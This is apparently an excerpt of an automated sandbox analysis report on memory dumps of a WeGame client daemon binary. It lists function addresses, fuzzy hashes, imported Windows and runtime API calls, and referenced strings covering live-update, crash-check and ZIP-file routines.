                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: gvB
                                                                • API String ID: 0-1399782011
                                                                • Opcode ID: 0e04ec0c0041b94bd1cb87ad1c44f6ba4c11315030640f5dce982510c5c1b6f0
                                                                • Instruction ID: 12bb980d7de2fb65320c5d578e093a5a304970f1210a34e05cd75f10957d1837
                                                                • Opcode Fuzzy Hash: 0e04ec0c0041b94bd1cb87ad1c44f6ba4c11315030640f5dce982510c5c1b6f0
                                                                • Instruction Fuzzy Hash: 8091D271F00219AFDF20CEA5DC409AEBBF3FF88300F558565E865D6390DA76EA158B50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0042E8B0 Relevance: .6, Instructions: 593COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc284984bdc7ce0e79e4b483c36e6a8ecad1b482a6aafd5b6cf61163e682f5c9
                                                                • Instruction ID: ae73e2bf66ccaaff9964dada5afca0f748d9cd759dcb10670564d661026e34ea
                                                                • Opcode Fuzzy Hash: bc284984bdc7ce0e79e4b483c36e6a8ecad1b482a6aafd5b6cf61163e682f5c9
                                                                • Instruction Fuzzy Hash: 1632C171B00B258FCB25CF6AD8806AAB7F6FF98304F44492EE45AD7344D738AA45CB45
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00430870 Relevance: .5, Instructions: 497COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20b5d22dff3294aac8d697e9f966c13d4bc2c365fe7616ea5ee579ee84bd28b3
                                                                • Instruction ID: ae1127875b3593b8e43296b5f5deb688eb7a909513b35ee3971124d0d3df6d71
                                                                • Opcode Fuzzy Hash: 20b5d22dff3294aac8d697e9f966c13d4bc2c365fe7616ea5ee579ee84bd28b3
                                                                • Instruction Fuzzy Hash: 0302C471F041258BDF0CCE58C5A03BDBBB2FB89305F15966ED4579B384CA789981CB88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004369A0 Relevance: .4, Instructions: 393COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Xlength_error@std@@
                                                                • String ID:
                                                                • API String ID: 1004598685-0
                                                                • Opcode ID: a56a3070a93fb6af3f833d39c567ceb51ba672f039b18ea4ec77d1bdb010b384
                                                                • Instruction ID: afe635cef5a6c0f3f5f321afc416774cf2310070c0ab2f1cc0b38ef3e72fcf13
                                                                • Opcode Fuzzy Hash: a56a3070a93fb6af3f833d39c567ceb51ba672f039b18ea4ec77d1bdb010b384
                                                                • Instruction Fuzzy Hash: E2D1E531704156ABDB25CF18D491BBBBBA2EB4A310F19D19BE8859B381C737EC05CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00432860 Relevance: .4, Instructions: 370COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: caf49820fa807b94d0f106b97b3a28fc126ac1404d47f7e6d138c94fc9639a5e
                                                                • Instruction ID: 0bdc4b9da05189594fb1be22d4fe1de2010d85a29226f93dafe81bd0dcaf12bf
                                                                • Opcode Fuzzy Hash: caf49820fa807b94d0f106b97b3a28fc126ac1404d47f7e6d138c94fc9639a5e
                                                                • Instruction Fuzzy Hash: 45F16E755082118FC709CF18C5D48FAB7F1AF69310B1A82FEC8899B3A6D7359981CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0042E420 Relevance: .2, Instructions: 160COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5be85cf39b96813196059f2e2c845c93c2b18162dba278d96fafe3fd2e9a71f0
                                                                • Instruction ID: 7c6578b157f667be30280ec36bb7862d1cfe1f98d25d2fae63655fc748c403d1
                                                                • Opcode Fuzzy Hash: 5be85cf39b96813196059f2e2c845c93c2b18162dba278d96fafe3fd2e9a71f0
                                                                • Instruction Fuzzy Hash: 7F616EB5A106298BCB24CF29C8887A9F7F4FB55304F5482E9D95DE7341D774AE808F84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0042E690 Relevance: .2, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa59ee88cf128c1e8401c6a181a001bbd7bd21adbe7b711660ed03f36a6a727c
                                                                • Instruction ID: 20224347e91579666be48488df7f76cb532f822d689253888921bdd3ad10e346
                                                                • Opcode Fuzzy Hash: aa59ee88cf128c1e8401c6a181a001bbd7bd21adbe7b711660ed03f36a6a727c
                                                                • Instruction Fuzzy Hash: AD51E172B10A058BDB1C8F29D8653ADB6A1FB44324F84837DE966DB3C2D7798845CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00424490 Relevance: .2, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e56e04736f2f2184acd5beb11e2b95f2201bbbbea82e3509248a38d4dc7451dc
                                                                • Instruction ID: 5315f027a34ab9a3d4b67d20a4267ca859666d811a4719d20f9402e24e7f37a3
                                                                • Opcode Fuzzy Hash: e56e04736f2f2184acd5beb11e2b95f2201bbbbea82e3509248a38d4dc7451dc
                                                                • Instruction Fuzzy Hash: 0A51F771A002354BDB608F3998803F7BFE0EB57305F5152BAD998D3282C73C995ADBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0042C740 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a74be371d626e219058fdc47951334e5fa7f54c1e53e11e6fc5102bed696a35c
                                                                • Instruction ID: 7d462837dbdcd5b7ada499c46f74ad40ede75c49795ed640528745222c967266
                                                                • Opcode Fuzzy Hash: a74be371d626e219058fdc47951334e5fa7f54c1e53e11e6fc5102bed696a35c
                                                                • Instruction Fuzzy Hash: 57518572E101299BEF04DF4CC8801AEB7B5FB89301F4584AAE856EB305D374EA52CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00422B50 Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7321def450bf70df530f14160c0007a4b1908ddab8227908a000adff2b1037c
                                                                • Instruction ID: fd5a73c7380fc56303ddc1df4e1824f8540c7790317b5ca71e8bd4bccd1ba8ab
                                                                • Opcode Fuzzy Hash: a7321def450bf70df530f14160c0007a4b1908ddab8227908a000adff2b1037c
                                                                • Instruction Fuzzy Hash: A61136319200745BCB84EF19E9D863A7794E783311B9A856ADD81DB108C638E5158768
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004647DD Relevance: 58.2, APIs: 18, Strings: 15, Instructions: 453COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004647E7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000150,004606A7,00000001,000000FF,000000FF,000000FF,00000003), ref: 004647EE
                                                                • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?), ref: 00464886
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(tgp,Perception,?,?,?,true,00000004), ref: 00464948
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,true,00000004), ref: 00464962
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(tgp,Guid,?,?,?,0048BBC7,00000000,?,?,?,true,00000004), ref: 00464A14
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,0048BBC7,00000000,?,?,?,true,00000004), ref: 00464A2E
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(tgp,OldVersion,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000,?,?,?,true), ref: 00464ACF
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(tgp,TargetVersion,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7), ref: 00464B8A
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000), ref: 00464BA4
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000,?,?,?,true,00000004), ref: 00464AE9
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,ExitOpSource,00000000,?), ref: 00464C24
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000), ref: 00464C3F
                                                                • ?to_string@version_t@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,?,?,?,0048BBC7,00000000,?,?,?,0048BBC7,00000000), ref: 00464C62
                                                                • ?WritePrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@000@Z.COMMON(tgp,OverwriteStatus,?,?,0048BBC7,00000000,?,?,?,?,?,?,?,?,0048BBC7,00000000), ref: 00464CC2
                                                                • GetLastError.KERNEL32(?,0048BBC7,00000000,?,?,?,?,?,?,?,?,0048BBC7,00000000), ref: 00464CE0
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?,00000000,?,?,?,?,?,?,0000000F,?,?,00000000,?), ref: 00464DA3
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,00000001,?,?,00000000,?,?,?,?,?,?,0000000F,?,?,00000000,?), ref: 00464DB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$PrivateProfile@Sys_wrapper@common@ierd_tgp@@$?get_log_instance@base@@Logger@1@Read$D@2@@std@@00V45@1@$D@2@@std@@ErrorLastV45@@$?get_app_sub_path@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?report@?to_string@version_t@common@ierd_tgp@@Application@common@ierd_tgp@@D@2@@std@@0D@2@@std@@000@H_prolog3H_prolog3_Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@Writememmove
                                                                • String ID: ExitOpSource$Guid$OldVersion$OverwriteStatus$Perception$TargetVersion$[Liveupdate][SolveUpdateResultAndQos]start_type:{} error:{}({}), wait:{}, move:{}$[Liveupdate]read tempfile, rs:{}, guid:{}$[Liveupdate]read tempfile, rs:{}, old_verson:{}$[Liveupdate]read tempfile, rs:{}, perction:{}$[Liveupdate]read tempfile, rs:{}, target_version:{}$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$tgp$true$update.tmp
                                                                • API String ID: 2480512091-1312611123
                                                                • Opcode ID: 262eff7a19b67cfa60b55684eaaac36eaf85132bc44145441f1792ea0142b8d3
                                                                • Instruction ID: e2e53fe4378b49f60d70e22cd2f2a160f49e38690087b90a2becabaf2f1fe7c2
                                                                • Opcode Fuzzy Hash: 262eff7a19b67cfa60b55684eaaac36eaf85132bc44145441f1792ea0142b8d3
                                                                • Instruction Fuzzy Hash: B412A171D01258EECF15EFA5C842BDEBBB4AF15304F50419EE109B7282DB785B48CBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043E45B Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 286fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043E465
                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E498
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E4B2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E4BC
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E509
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,000000F4), ref: 0043E553
                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000082,00000000), ref: 0043E5F8
                                                                • CloseHandle.KERNEL32(00000000), ref: 0043E604
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0043E60C
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,000000A1,0048BBC7), ref: 0043E649
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,?,?), ref: 0043E75A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$File$CloseCreateDeleteErrorExistsH_prolog3H_prolog3_HandleLastPath
                                                                • String ID: Before exit, delete run flag file fail.$Before exit, delete run flag file.$Before exit, prepare create hash file failed. err %d$Before exit, run flag file not find.$Before exit, write hash failed. %ws$Flag$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp$fileinfo.hash$login_pic\
                                                                • API String ID: 1687871307-227224237
                                                                • Opcode ID: 6b49dcece3e310c79c58057db7daebd4c96d28511a59199f379b5133c0a4afd5
                                                                • Instruction ID: 99cf901da42364260673f1529c73074917709481d81b6993c2adfcfe0e8dc8bb
                                                                • Opcode Fuzzy Hash: 6b49dcece3e310c79c58057db7daebd4c96d28511a59199f379b5133c0a4afd5
                                                                • Instruction Fuzzy Hash: F3B1E430E01248EADB21EBA1CC56FDE77749F59308F1040AAE4457B2C2EB785E49CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00422C30 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 380stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00422CB0
                                                                • memmove.VCRUNTIME140(?,?,?), ref: 00422CCD
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00422D66
                                                                • memset.VCRUNTIME140(?,00000000,00000200,?,?), ref: 00422DD0
                                                                • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,?), ref: 00422E04
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?), ref: 00422E35
                                                                • strrchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?), ref: 00422E4F
                                                                • memset.VCRUNTIME140(?,00000000,00000200,?,?,?,?,?,?,?,?), ref: 00422E82
                                                                • memset.VCRUNTIME140(?,00000000,00000200), ref: 00422EDF
                                                                • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,?,00000000), ref: 00422EFD
                                                                • fopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,0048B640), ref: 00422F8E
                                                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000), ref: 00422FA6
                                                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00422FBB
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00423058
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$_invalid_parameter_noinfo_noreturnfclose$fopen_sfreefseekmemmovestrcpy_sstrncpy_sstrrchr
                                                                • String ID: ZIP_IO::OpenFile() $ZIP_IO::OpenFile() $ZIP_IO::OpenFile() $ZIP_IO::OpenFile() $ZIP_IO::OpenFile()
                                                                • API String ID: 2338250784-3811104777
                                                                • Opcode ID: 067622d8e7ffc038f4a3775d1d16a20a93d9a3173b19b595fc346fb6d3ca8388
                                                                • Instruction ID: f568c44e46b06ec64509d62548a61a486d8d9eb247b431e3b3ff8053dcda85bf
                                                                • Opcode Fuzzy Hash: 067622d8e7ffc038f4a3775d1d16a20a93d9a3173b19b595fc346fb6d3ca8388
